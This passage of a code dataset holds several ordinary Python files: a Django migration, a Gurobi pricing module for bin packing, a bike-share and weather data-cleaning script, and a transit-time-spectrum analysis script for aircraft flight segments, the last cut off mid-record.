+{"seq_id":"41796558046","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('app', '0094_auto_20160318_1850'),\n    ]\n\n    operations = [\n        migrations.AlterModelOptions(\n            name='tagbase',\n            options={'ordering': ['date_v_debut'], 'verbose_name': 'Tag r\xe9f\xe9rent', 'verbose_name_plural': 'Tags r\xe9f\xe9rents'},\n        ),\n        migrations.AddField(\n            model_name='personnetravel',\n            name='photo1',\n            field=models.ForeignKey(related_name='photo1', verbose_name='Travel picture 1', blank=True, to='app.Photo', null=True),\n        ),\n        migrations.AddField(\n            model_name='personnetravel',\n            name='photo2',\n            field=models.ForeignKey(related_name='photo2', verbose_name='Travel picture 2', blank=True, to='app.Photo', null=True),\n        ),\n        migrations.AddField(\n            model_name='personnetravel',\n            name='photo3',\n            field=models.ForeignKey(related_name='photo3', verbose_name='Travel picture 3', blank=True, to='app.Photo', null=True),\n        ),\n        migrations.AlterField(\n            model_name='tagtraduit',\n            name='tag',\n            field=models.ForeignKey(related_name='tag', default=None, blank=True, to='app.TagBase', help_text=\"C'est le tag r\xe9f\xe9rent\", null=True),\n        ),\n    ]\n","repo_name":"super0605/cogofly-v1","sub_path":"app/migrations/0095_auto_20160321_1720.py","file_name":"0095_auto_20160321_1720.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"39598653194","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# @Time : 2020/9/25 21:51\r\n# Author: Zheng Shaoxiang\r\n# @Email : zhengsx95@163.com\r\n# Description:\r\nfrom labelSetting import LabelSetting\r\nfrom gurobipy import *\r\n\r\n\r\nclass Pricing:\r\n    def __init__(self, s, use_model=False):\r\n        self.data = None\r\n        self.s = s # ((1, 2, 3), (4, 5, 6),...)\r\n        self.n = None\r\n        self.graph = None\r\n        self.pricing = None # Model()\r\n        self.y, self.z = None, None\r\n        self.use_model = use_model # solve the pricing problem with the MIP model\r\n        self.lab = None # LabelSetting instance\r\n\r\n    def build_model(self, data, graph):\r\n        self.pricing = Model(\"pricing\")\r\n\r\n        item_id = [item.id for item in data.items]\r\n        w = {item.id: item.width for item in data.items}\r\n        self.y = self.pricing.addVars(item_id, vtype=GRB.BINARY, name=\"y\")\r\n\r\n        self.pricing.addConstr(quicksum(self.y[i] * w[i] for i in item_id) <= data.capacity, 
name=\"capacity\")\r\n\r\n if self.s is not None:\r\n self.z = self.pricing.addVars(self.s, vtype=GRB.BINARY, name=\"z\")\r\n\r\n # self.s中item id可能已经被删除,因此添加条件i in item_id and j in item_id\r\n self.pricing.addConstrs((self.z[s] >= self.y[i] + self.y[j] - 1\r\n for s in self.s for i in s for j in s if i < j and i in item_id and j in item_id),\r\n name=\"sr_constr1\")\r\n self.pricing.addConstrs((self.z[s] <= self.y[i] + self.y[j]\r\n for s in self.s for i in s for j in s if i < j and i in item_id and j in item_id),\r\n name=\"sr_constr2\")\r\n if graph.has_node(): # 图不为空\r\n self.pricing.addConstrs((self.y[i] + self.y[j] <= 1\r\n for i, j in graph.get_all_edges()), name=\"incompatibility\")\r\n self.pricing.ModelSense = GRB.MAXIMIZE\r\n self.set_parameters()\r\n\r\n def set_parameters(self):\r\n self.pricing.Params.OutputFlag = False\r\n\r\n def update_objective(self, exact, sr):\r\n self.pricing.update()\r\n for x, v in zip(self.y.values(), exact):\r\n x.obj = v\r\n if self.z is not None:\r\n for x, v in zip(self.z.values(), sr):\r\n x.obj = v\r\n\r\n def optimize(self):\r\n self.pricing.update()\r\n self.pricing.optimize()\r\n\r\n def get_reduced_cost(self):\r\n\r\n if self.use_model:\r\n return 1 - self.pricing.objVal\r\n else:\r\n if self.lab.labels:\r\n return self.lab.labels[0].c\r\n return 0\r\n\r\n def getConstrs(self):\r\n return self.pricing.getConstrs()\r\n\r\n def get_coe(self):\r\n sr_coe = []\r\n if self.use_model:\r\n # round() 为避免数值误差\r\n exact_coe = [round(v.x) for v in self.y.values()]\r\n if self.s is not None:\r\n sr_coe = [round(v.x) for v in self.z.values()]\r\n res = [exact_coe + sr_coe]\r\n else:\r\n res = []\r\n for label in self.lab.labels:\r\n exact_coe = [1 if i in label.v else 0 for i in range(self.n)]\r\n sr_coe = label.z\r\n res.append(exact_coe + sr_coe)\r\n\r\n return res\r\n\r\n def solve(self, ex_dual, sr_dual, data, graph):\r\n \"\"\"\r\n :param ex_dual: list[]\r\n :param sr_dual: list[]\r\n :param data:\r\n :param graph:\r\n :return:\r\n \"\"\"\r\n if self.use_model:\r\n self.build_model(data, graph)\r\n self.update_objective(ex_dual, sr_dual)\r\n self.optimize()\r\n else:\r\n self.n = data.n\r\n self.lab = LabelSetting(data, self.s, ex_dual, sr_dual, graph)\r\n self.lab.solve()\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n","repo_name":"shaoxiang-zheng/Branch-and-price-for-one-dimensional-bin-packing","sub_path":"pricing.py","file_name":"pricing.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"92"} +{"seq_id":"20905003914","text":"import os\nimport sys\nimport shutil\nimport pandas as pd\nfrom dateutil import parser\nimport traceback\nimport zipfile\nfrom tqdm import tqdm\n\nfrom joblib.memory import Memory\n\nimport station_name\n\nprint('loading data...')\nwith zipfile.ZipFile('brut.zip') as myzip:\n with myzip.open('brut/weather_bicincitta_parma.csv') as myfile:\n weather = pd.read_csv(myfile, delimiter=';', header=None, names=[\"Timestamp\", \"Status\", \"Clouds\", \"Humidity\", \"Pressure\", \"Rain\", \"WindGust\", \"WindVarEnd\", \"WindVarBeg\", \"WindDeg\", \"WindSpeed\", \"Snow\", \"TemperatureMax\", \"TemperatureMin\", \"TemperatureTemp\"])\n with myzip.open('brut/status_bicincitta_parma.csv') as myfile:\n bike = pd.read_csv(myfile, sep=';', header=None, names=[\"Timestamp\",\"Station\",\"Status\",\"Bikes\",\"Slots\"])\n # with myzip.open('brut/bicincitta_parma_summary.csv') as myfile:\n # stations = pd.read_csv(myfile, delimiter=';')\nprint('data 
loaded')\n\ndef parse_date(df):\n    def valid_datetime(date):\n        try:\n            return parser.parse(date)\n        except ValueError:\n            print(\"Invalid date:\", date)\n            return None\n    df['Timestamp'] = df['Timestamp'].apply(valid_datetime)\n    return df\n\ndef clean_timestamp(df):\n    df = df[df[\"Timestamp\"].notnull()]  # '!= None' never filters element-wise in pandas\n    return df\n\ndef clean_bike_data(bike_df):\n    bike_df = clean_timestamp(bike_df)\n    bike_df = bike_df[bike_df[\"Status\"] == 1]\n    return bike_df\n\n# ///////////// Weather ///////////////////\n\nprint('parsing and cleaning weather data')\n# drop useless columns\nweather = weather.drop(columns = ['Clouds', 'WindGust', 'WindVarEnd', 'WindVarBeg', 'TemperatureMax', 'TemperatureMin'])\n\n# parse datetimes\nweather = parse_date(weather)\nweather = clean_timestamp(weather)\n# print(weather.head(10))\n\nweather = weather.set_index('Timestamp').resample('10min', label='right', closed='right').last().dropna().reset_index()\n# print(weather.head(10))\n\n# ////////////// Bike ////////////////////\n\nprint('parsing and cleaning bike data')\nbike = parse_date(bike)\nbike = clean_bike_data(bike)\n# print(bike.head(10))\n\n# normalize names\nbike['Station'] = bike['Station'].apply(lambda name: station_name.names[name])\nbike = bike.drop(columns = ['Status'])\nbike['Total'] = bike['Bikes'] + bike['Slots']\nStations = []\n\n# resample, merge and split\nprint('resampling and merging data')\nfor cle, df in bike.groupby('Station'):\n    # print(cle, df)\n    df = df.set_index('Timestamp').resample('10min', label='right', closed='right').last().dropna().reset_index()\n    df = df.merge(weather, on='Timestamp')\n    Stations.append(df)\n    # print(df.head(5))\n\n\nprint('Creating folders and files: ')\n\npathStations = \"./Stations\"\nif not os.path.exists(pathStations):\n    os.mkdir(pathStations)\n\nlenStations = len(Stations)\ncountStation = 0\n\nfor station in Stations:\n    countStation += 1\n    print('Station ' + str(countStation) + '/' + str(lenStations) + ' :')\n\n    pathSpecificStation = pathStations + '/' + station['Station'][0].replace('. 
', '_')\n\n if not os.path.exists(pathSpecificStation):\n os.mkdir(pathSpecificStation)\n\n # split on time's gap\n counter = 1\n previousTime = station['Timestamp'][0]\n minIndex = 0\n maxIndex = len(station['Timestamp']) - 1\n # print('je passe là')\n\n for t in tqdm(range(maxIndex + 1)):\n\n diff = station['Timestamp'][t] - previousTime\n diffMin = diff.seconds / 60.\n # print(diffMin)\n\n if(diffMin - 10 > 0.001):\n station.loc[minIndex : t].set_index('Timestamp').to_csv(pathSpecificStation + '/' + str(counter) + '.csv.gz', compression='gzip')\n counter += 1\n minIndex = t+1\n\n previousTime = station['Timestamp'][t]\n\n station.loc[minIndex : maxIndex].set_index('Timestamp').to_csv(pathSpecificStation + '/' + str(counter) + '.csv.gz', compression='gzip')\n","repo_name":"JMSaindon/DonneesBrutesVelo","sub_path":"DonneesBrutes/exoDonneesBrutes.py","file_name":"exoDonneesBrutes.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"24115384327","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# script to get TTS for all UT segments \n# date created: 3/2/2020\n# author: sofia chelpon\n############################ PREP WORKSPACE ############################\nimport numpy as np \nimport pandas as pd\n\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\n# import my TTS module, need to add path to folder\nimport sys\nsys.path.insert(1, '/UTLS/schelpon/TTS_2020/base_tts_code/')\nimport tts_mod\n\n# read in ratios dataframe\npath = \"/UTLS/schelpon/TTS_2020/get_tts/tts_vary_ut/data_prep/contrast_ratios_ut_seg.pkl\"\ncontrast_ratios = pd.read_pickle(path)\ninfo = contrast_ratios.iloc[[0, 1]]\nsegment_info = info.drop(columns = 'Instrument').drop(columns = 'BL_tau').drop(columns = 'TROPO_tau').drop(columns = 'UT_tau')\nseg_info = segment_info.transpose()\n\n# get index of each flight \nidx_rf05 = seg_info[seg_info['Flight'] == 'RF05'].index.tolist()\nidx_rf06 = seg_info[seg_info['Flight'] == 'RF06'].index.tolist()\nidx_rf07 = seg_info[seg_info['Flight'] == 'RF07'].index.tolist()\nidx_rf08 = seg_info[seg_info['Flight'] == 'RF08'].index.tolist()\nidx_rf09 = seg_info[seg_info['Flight'] == 'RF09'].index.tolist()\nidx_rf10 = seg_info[seg_info['Flight'] == 'RF10'].index.tolist()\nidx_rf11 = seg_info[seg_info['Flight'] == 'RF11'].index.tolist()\nidx_rf12 = seg_info[seg_info['Flight'] == 'RF12'].index.tolist()\nidx_rf13 = seg_info[seg_info['Flight'] == 'RF13'].index.tolist()\nidx_rf14 = seg_info[seg_info['Flight'] == 'RF14'].index.tolist()\n\n# sort \nratios_sort = contrast_ratios\nratios_sort = ratios_sort.drop('Time_UTC').drop('Flight')\nratios_sort = ratios_sort.sort_values(['BL_tau'])\n\n# save ordered bl tau as a variable \ntau = ratios_sort['BL_tau']\n\n# drop uncecessary columns \nratios_sort = ratios_sort.drop(columns = ['Instrument', 'BL_tau', 'TROPO_tau', 'UT_tau'])\nratios_sort.head()\n\n\n\n###############################################################################################\n################################ \t\tRF 05 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf05 = []\nmean_rf05 = []\nmode_rf05 = []\nnum = []\nbestk_rf05 = []\n\nutbl_rf05 = pd.DataFrame()\nmustar_rf05 = pd.DataFrame()\ngf_rf05 = pd.DataFrame()\nt_rf05 = pd.DataFrame()\ntau_rf05 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf05].columns: \n utbl_rf05[col] = ''\n mustar_rf05[col] 
= ''\n gf_rf05[col] = ''\n t_rf05[col] = ''\n tau_rf05[col] = ''\n\n# lgnth of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf05]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf05.append(best_k)\n r2_rf05.append(my_r2)\n mean_rf05.append(mean_age)\n mode_rf05.append(mode_age)\n # ----- save to dataframes\n utbl_rf05[col] = np.ndarray.flatten(my_utbl)\n mustar_rf05[col] = np.ndarray.flatten(my_mustar)\n tau_rf05[col] = np.ndarray.flatten(my_tau)\n gf_rf05[col] = np.ndarray.flatten(my_gf)\n t_rf05[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf05 = seg_info[seg_info['Flight'] == 'RF05']\n\nsegment_info_rf05['r squared'] = r2_rf05\nsegment_info_rf05['mean age'] = mean_rf05\nsegment_info_rf05['mode age'] = mode_rf05\nsegment_info_rf05['best k'] = bestk_rf05\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf05.pkl')\n\n# save others \nutbl_rf05.to_pickle('./perflight_output/utbl_rf05.pkl')\nmustar_rf05.to_pickle('./perflight_output/mustar_rf05.pkl')\ntau_rf05.to_pickle('./perflight_output/tau_rf05.pkl')\ngf_rf05.to_pickle('./perflight_output/gf_rf05.pkl')\nt_rf05.to_pickle('./perflight_output/t_rf05.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 06 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf06 = []\nmean_rf06 = []\nmode_rf06 = []\nnum = []\nbestk_rf06 = []\n\nutbl_rf06 = pd.DataFrame()\nmustar_rf06 = pd.DataFrame()\ngf_rf06 = pd.DataFrame()\nt_rf06 = pd.DataFrame()\ntau_rf06 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf06].columns: \n utbl_rf06[col] = ''\n mustar_rf06[col] = ''\n gf_rf06[col] = ''\n t_rf06[col] = ''\n tau_rf06[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf06]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, 
exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf06.append(best_k)\n r2_rf06.append(my_r2)\n mean_rf06.append(mean_age)\n mode_rf06.append(mode_age)\n # ----- save to dataframes\n utbl_rf06[col] = np.ndarray.flatten(my_utbl)\n mustar_rf06[col] = np.ndarray.flatten(my_mustar)\n tau_rf06[col] = np.ndarray.flatten(my_tau)\n gf_rf06[col] = np.ndarray.flatten(my_gf)\n t_rf06[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf06 = seg_info[seg_info['Flight'] == 'RF06']\n\nsegment_info_rf06['r squared'] = r2_rf06\nsegment_info_rf06['mean age'] = mean_rf06\nsegment_info_rf06['mode age'] = mode_rf06\nsegment_info_rf06['best k'] = bestk_rf06\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf06.pkl')\n\n# save others \nutbl_rf06.to_pickle('./perflight_output/utbl_rf06.pkl')\nmustar_rf06.to_pickle('./perflight_output/mustar_rf06.pkl')\ntau_rf06.to_pickle('./perflight_output/tau_rf06.pkl')\ngf_rf06.to_pickle('./perflight_output/gf_rf06.pkl')\nt_rf06.to_pickle('./perflight_output/t_rf06.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 07 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf07 = []\nmean_rf07 = []\nmode_rf07 = []\nnum = []\nbestk_rf07 = []\n\nutbl_rf07 = pd.DataFrame()\nmustar_rf07 = pd.DataFrame()\ngf_rf07 = pd.DataFrame()\nt_rf07 = pd.DataFrame()\ntau_rf07 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf07].columns: \n utbl_rf07[col] = ''\n mustar_rf07[col] = ''\n gf_rf07[col] = ''\n t_rf07[col] = ''\n tau_rf07[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf07]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf07.append(best_k)\n r2_rf07.append(my_r2)\n mean_rf07.append(mean_age)\n mode_rf07.append(mode_age)\n # ----- 
save to dataframes\n utbl_rf07[col] = np.ndarray.flatten(my_utbl)\n mustar_rf07[col] = np.ndarray.flatten(my_mustar)\n tau_rf07[col] = np.ndarray.flatten(my_tau)\n gf_rf07[col] = np.ndarray.flatten(my_gf)\n t_rf07[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf07 = seg_info[seg_info['Flight'] == 'RF07']\n\nsegment_info_rf07['r squared'] = r2_rf07\nsegment_info_rf07['mean age'] = mean_rf07\nsegment_info_rf07['mode age'] = mode_rf07\nsegment_info_rf07['best k'] = bestk_rf07\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf07.pkl')\n\n# save others \nutbl_rf07.to_pickle('./perflight_output/utbl_rf07.pkl')\nmustar_rf07.to_pickle('./perflight_output/mustar_rf07.pkl')\ntau_rf07.to_pickle('./perflight_output/tau_rf07.pkl')\ngf_rf07.to_pickle('./perflight_output/gf_rf07.pkl')\nt_rf07.to_pickle('./perflight_output/t_rf07.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 08 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf08 = []\nmean_rf08 = []\nmode_rf08 = []\nnum = []\nbestk_rf08 = []\n\nutbl_rf08 = pd.DataFrame()\nmustar_rf08 = pd.DataFrame()\ngf_rf08 = pd.DataFrame()\nt_rf08 = pd.DataFrame()\ntau_rf08 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf08].columns: \n utbl_rf08[col] = ''\n mustar_rf08[col] = ''\n gf_rf08[col] = ''\n t_rf08[col] = ''\n tau_rf08[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf08]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf08.append(best_k)\n r2_rf08.append(my_r2)\n mean_rf08.append(mean_age)\n mode_rf08.append(mode_age)\n # ----- save to dataframes\n utbl_rf08[col] = np.ndarray.flatten(my_utbl)\n mustar_rf08[col] = np.ndarray.flatten(my_mustar)\n tau_rf08[col] = np.ndarray.flatten(my_tau)\n gf_rf08[col] = np.ndarray.flatten(my_gf)\n t_rf08[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf08 = seg_info[seg_info['Flight'] == 'RF08']\n\nsegment_info_rf08['r squared'] = r2_rf08\nsegment_info_rf08['mean age'] = mean_rf08\nsegment_info_rf08['mode age'] = mode_rf08\nsegment_info_rf08['best k'] = bestk_rf08\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf08.pkl')\n\n# save others 
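\n# note: the columns above were NaN-padded to fixed lengths (52 for the ratio/tau/mu* series, 275999 for G(t) and t)\n# so that every segment of a flight fits in a single DataFrame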
\nutbl_rf08.to_pickle('./perflight_output/utbl_rf08.pkl')\nmustar_rf08.to_pickle('./perflight_output/mustar_rf08.pkl')\ntau_rf08.to_pickle('./perflight_output/tau_rf08.pkl')\ngf_rf08.to_pickle('./perflight_output/gf_rf08.pkl')\nt_rf08.to_pickle('./perflight_output/t_rf08.pkl')\n\n\n#####################################################################################################\n################################ \t\tRF 09 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf09 = []\nmean_rf09 = []\nmode_rf09 = []\nnum = []\nbestk_rf09 = []\n\nutbl_rf09 = pd.DataFrame()\nmustar_rf09 = pd.DataFrame()\ngf_rf09 = pd.DataFrame()\nt_rf09 = pd.DataFrame()\ntau_rf09 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf09].columns: \n utbl_rf09[col] = ''\n mustar_rf09[col] = ''\n gf_rf09[col] = ''\n t_rf09[col] = ''\n tau_rf09[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf09]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf09.append(best_k)\n r2_rf09.append(my_r2)\n mean_rf09.append(mean_age)\n mode_rf09.append(mode_age)\n # ----- save to dataframes\n utbl_rf09[col] = np.ndarray.flatten(my_utbl)\n mustar_rf09[col] = np.ndarray.flatten(my_mustar)\n tau_rf09[col] = np.ndarray.flatten(my_tau)\n gf_rf09[col] = np.ndarray.flatten(my_gf)\n t_rf09[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf09 = seg_info[seg_info['Flight'] == 'RF09']\n\nsegment_info_rf09['r squared'] = r2_rf09\nsegment_info_rf09['mean age'] = mean_rf09\nsegment_info_rf09['mode age'] = mode_rf09\nsegment_info_rf09['best k'] = bestk_rf09\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf09.pkl')\n\n# save others \nutbl_rf09.to_pickle('./perflight_output/utbl_rf09.pkl')\nmustar_rf09.to_pickle('./perflight_output/mustar_rf09.pkl')\ntau_rf09.to_pickle('./perflight_output/tau_rf09.pkl')\ngf_rf09.to_pickle('./perflight_output/gf_rf09.pkl')\nt_rf09.to_pickle('./perflight_output/t_rf09.pkl')\n\n\n\n#####################################################################################################\n################################ \t\tRF 10 \t\t\t#############################\n############ --------------- LOOP THRU EACH SEGMENT, GET TTS OUTPUT --------------- ###########\n# --------------- things to fill \nr2_rf10 = []\nmean_rf10 = []\nmode_rf10 = []\nnum = []\nbestk_rf10 
= []\n\nutbl_rf10 = pd.DataFrame()\nmustar_rf10 = pd.DataFrame()\ngf_rf10 = pd.DataFrame()\nt_rf10 = pd.DataFrame()\ntau_rf10 = pd.DataFrame()\n\nfor col in ratios_sort[idx_rf10].columns: \n utbl_rf10[col] = ''\n mustar_rf10[col] = ''\n gf_rf10[col] = ''\n t_rf10[col] = ''\n tau_rf10[col] = ''\n\n# max length of G(t), usually 275999 but make higher so it doesnt fail \ntopg = 276000\n\nfor col in ratios_sort[idx_rf10]:\n print(col)\n # ----- remove nans or else tts function fails \n utbl_full = np.array(ratios_sort[col].values, dtype=np.float64)\n utbl_not_null_idx = np.argwhere(~np.isnan(utbl_full))\n # ----- inputs without nans \n my_utbl = utbl_full[utbl_not_null_idx]\n my_tau = tau[utbl_not_null_idx]\n #\n # ----- run tts function \n t, exp_decay_matrix, LT = tts_mod.prep_for_tts(my_tau)\n my_mustar, my_r2, my_gf, my_t, mean_age, mode_age, best_k = tts_mod.get_tts(my_utbl, my_tau, t, exp_decay_matrix, LT)\n #\n # ----- fill to make mu*, tau all length 52\n diffa = len(utbl_full) - len(my_utbl)\n if (diffa > 0):\n filla = np.empty((1,diffa))\n filla.fill(np.nan)\n my_tau = np.append(my_tau, filla)\n my_mustar = np.append(my_mustar, filla)\n my_utbl = np.append(my_utbl, filla)\n # ----- fill to make gf, t all length 275999\n diffb = 275999 - len(my_gf)\n if (diffb > 0):\n fillb = np.empty((1,diffb))\n fillb.fill(np.nan)\n my_gf = np.append(my_gf, fillb)\n my_t = np.append(my_t, fillb)\n #\n # ----- save individual values \n bestk_rf10.append(best_k)\n r2_rf10.append(my_r2)\n mean_rf10.append(mean_age)\n mode_rf10.append(mode_age)\n # ----- save to dataframes\n utbl_rf10[col] = np.ndarray.flatten(my_utbl)\n mustar_rf10[col] = np.ndarray.flatten(my_mustar)\n tau_rf10[col] = np.ndarray.flatten(my_tau)\n gf_rf10[col] = np.ndarray.flatten(my_gf)\n t_rf10[col] = np.ndarray.flatten(my_t)\n\n# -------------------- make dataframe for r2, mean, mode, segment info \n# save outputs\nsegment_info_rf10 = seg_info[seg_info['Flight'] == 'RF10']\n\nsegment_info_rf10['r squared'] = r2_rf10\nsegment_info_rf10['mean age'] = mean_rf10\nsegment_info_rf10['mode age'] = mode_rf10\nsegment_info_rf10['best k'] = bestk_rf10\n\nsegment_info.to_pickle('./perflight_output/segment_info_rf10.pkl')\n\n# save others 